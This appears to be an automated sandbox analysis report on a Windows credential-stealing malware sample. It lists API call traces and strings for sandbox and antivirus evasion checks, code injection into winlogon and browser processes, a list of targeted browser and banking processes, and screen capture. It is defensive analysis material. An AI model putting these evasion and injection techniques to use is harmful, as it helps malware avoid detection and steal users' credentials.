                                                                                                                                                                                                            • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02C73BA7
                                                                                                                                                                                                            • main, xrefs: 02C73B57
                                                                                                                                                                                                            • scr.bmp, xrefs: 02C73F58
                                                                                                                                                                                                            • CallStack:, xrefs: 02C73CBD
                                                                                                                                                                                                            • DEBUG, xrefs: 02C73FAD
                                                                                                                                                                                                            • Self exception = TRUE, xrefs: 02C73BF8
                                                                                                                                                                                                            • ExceptionAddress = , xrefs: 02C73AD4
Memory Dump Source
• Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Control-flow Graph (graph image not preserved in this extract; nodes are marked Executed or Not Executed; first block at 00402C10)
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(user32.dll), ref: 00402C21
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402C35
                                                                                                                                                                                                              • Part of subcall function 00403900: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                              • Part of subcall function 00403900: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                              • Part of subcall function 00403900: RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                              • Part of subcall function 00403900: GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                              • Part of subcall function 00403900: CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                              • Part of subcall function 00403900: strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                              • Part of subcall function 00403900: strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                              • Part of subcall function 00403900: strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                              • Part of subcall function 00403900: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                              • Part of subcall function 00403900: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                              • Part of subcall function 00403900: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402C46
                                                                                                                                                                                                            • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402C5D
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402C69
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402C7B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 00402C9B
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402CAC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                            • String ID: Fri Jun 17 05:52:09 20112$IsWow64Process$PnEw$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                            • API String ID: 3353599405-3887202299
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040397F
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                            • strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                            • strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403A9F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AB1
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403AC3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                            • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                            • API String ID: 1431998568-3499098167
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitThread$Startupsocket
                                                                                                                                                                                                            • String ID: login$pass
                                                                                                                                                                                                            • API String ID: 1705285421-2248183487
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C86370: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02C86384
                                                                                                                                                                                                              • Part of subcall function 02C86370: Process32First.KERNEL32(00000000,?), ref: 02C863A9
                                                                                                                                                                                                              • Part of subcall function 02C86370: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02C863CD
                                                                                                                                                                                                              • Part of subcall function 02C86370: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|,?,?,00000000), ref: 02C863E7
                                                                                                                                                                                                              • Part of subcall function 02C86370: EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C8640B
                                                                                                                                                                                                              • Part of subcall function 02C86370: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02C86411
                                                                                                                                                                                                              • Part of subcall function 02C86370: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C86418
                                                                                                                                                                                                              • Part of subcall function 02C86370: LeaveCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C86446
                                                                                                                                                                                                              • Part of subcall function 02C86370: Process32Next.KERNEL32(00000000,00000128), ref: 02C8645A
                                                                                                                                                                                                              • Part of subcall function 02C86370: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02C86474
                                                                                                                                                                                                              • Part of subcall function 02C86370: CloseHandle.KERNEL32(00000000,?,00000000), ref: 02C86485
                                                                                                                                                                                                            • OpenProcess.KERNEL32 ref: 02C86510
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C86534
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C86558
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8656A
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD8A0), ref: 02C86575
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86594
                                                                                                                                                                                                            • OpenProcess.KERNEL32(?,00001400,?), ref: 02C86610
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C86631
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,FFFFFFFF), ref: 02C86655
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C86667
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD8A0), ref: 02C86672
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86698
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C866E6
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C86731
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD8A0,?,?), ref: 02C86770
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02C8677A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C86781
                                                                                                                                                                                                            • OpenProcess.KERNEL32(?,00001400,?), ref: 02C867D0
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C867F3
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00001400), ref: 02C8681B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 02C8682D
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C8684D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8687A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C86881
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8688D
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C86894
                                                                                                                                                                                                            • Sleep.KERNEL32(00000032), ref: 02C868A0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process$CriticalHandleHeapSection$CloseEnterInformationLeave$OpenTimes$AllocProcess32QueryVirtual$CreateCurrentFirstFreeNextSleepSnapshotToolhelp32Validate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1045582906-0
                                                                                                                                                                                                            • Opcode ID: b5554ce6a6e97e970ca9dc0c4d7c248bb66e36c801cb0225fb34d715afcd3c88
                                                                                                                                                                                                            • Instruction ID: c6614f8cda1026375bc89473445eaafcaf29e54397b90c84eaf1897da800079e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5554ce6a6e97e970ca9dc0c4d7c248bb66e36c801cb0225fb34d715afcd3c88
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83C1E5B0948391AFD321DF65C884A5AFBE8BFC8B14F208A5EF59A87240D770D545CF92
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,02C92BB9,75495CE0), ref: 02C7670B
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C76712
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7672A
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C76739
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 02C76761
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocFileFindFirstProcesslstrcpynmemset
                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                            • API String ID: 2617121151-1173974218
                                                                                                                                                                                                            • Opcode ID: 08f605f3dea216708c9ac44273907c8a67f20b2d80d1f0db99049bcdb3fcf0bf
                                                                                                                                                                                                            • Instruction ID: 7becebad95b7428ba07262907e1d3278c4549d4a02366af0e28626690a94c87c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08f605f3dea216708c9ac44273907c8a67f20b2d80d1f0db99049bcdb3fcf0bf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00616A71E447865BC7224F309C98BA77FADEF81754F244A54F9819B282DB31D60CC791
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401C70: memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                              • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                              • Part of subcall function 00401C70: GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                              • Part of subcall function 00401C70: SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                              • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                              • Part of subcall function 00401C70: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                              • Part of subcall function 00401C70: CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000000,?,7702DB30,00402E38,winlogon.exe), ref: 004015AD
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,7702DB30,00402E38,winlogon.exe), ref: 004015CC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004015EB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401601
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 0040160D
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401628
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401638
                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040167F
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 004016A1
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004016CD
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?), ref: 004016E8
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401703
                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401711
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,?,00406400,00050200,?), ref: 00401744
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401754
                                                                                                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401766
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 0040177E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040178F
                                                                                                                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004017B0
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 004017CC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004017DD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            • API String ID: 3542510048-3024904723
                                                                                                                                                                                                            • Opcode ID: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                            • Instruction ID: c9964d6c084eb6c4e09adf0a78a82ba29cca963801df753bbce45d31a4150425
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5571A3B1600315ABE710DFA4DD89F6F77B8AF84B04F144029FA05B72D1E7B8994587AC
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C93B50: memset.MSVCRT ref: 02C93B76
                                                                                                                                                                                                              • Part of subcall function 02C93B50: CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,75570F00), ref: 02C93B87
                                                                                                                                                                                                              • Part of subcall function 02C93B50: GetLastError.KERNEL32 ref: 02C93B90
                                                                                                                                                                                                              • Part of subcall function 02C93B50: SwitchToThread.KERNEL32 ref: 02C93B9F
                                                                                                                                                                                                              • Part of subcall function 02C93B50: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02C93BA8
                                                                                                                                                                                                              • Part of subcall function 02C93B50: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93BC8
                                                                                                                                                                                                              • Part of subcall function 02C93B50: CloseHandle.KERNEL32(00000000), ref: 02C93BD9
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02C9327F
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02C9329E
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C932BD
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C932D3
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 02C932DF
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C932FA
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C9330A
                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02C93344
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02C93365
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02C93391
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,?,00003000,00000004), ref: 02C933A9
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02C933C4
                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02C933D2
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02C933FA
                                                                                                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C9340C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C93424
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C93435
                                                                                                                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C93456
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C93472
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C93483
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            • API String ID: 2650560580-3024904723
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 02C9395E
                                                                                                                                                                                                            • GetWindowDC.USER32(00000000), ref: 02C93965
                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 02C9397A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$CompatibleCreateDesktop
                                                                                                                                                                                                            • String ID: ($BM
                                                                                                                                                                                                            • API String ID: 3720047489-2980357723
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75495CE0), ref: 02C97D61
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C97D7D
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 02C97D8C
                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 02C97D99
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 02C97DD8
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 02C97DE6
                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,?), ref: 02C97EDD
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 02C97EEC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
                                                                                                                                                                                                            • String ID: %s%s$%s\%s$%s\*$.
                                                                                                                                                                                                            • API String ID: 2477558990-1591360731
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                            • DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                            • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                            • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                            • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                            • API String ID: 1656757314-3977723178
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02C77041
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C77052
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02C77060
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C77069
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7707F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C77091
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C770B9
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02C770D2
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 02C770DD
                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000), ref: 02C770E9
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 02C770F4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mutex$HandleOpenSleep$CloseEventExitFileInformationModuleNameProcessRelease
                                                                                                                                                                                                            • String ID: Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}$P0Wu$\explorer.exe
                                                                                                                                                                                                            • API String ID: 2248524772-1625487603
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocfree$exit
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 337157181-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02C86384
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 02C863A9
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000), ref: 02C863CD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|,?,?,00000000), ref: 02C863E7
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C8640B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02C86411
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C86418
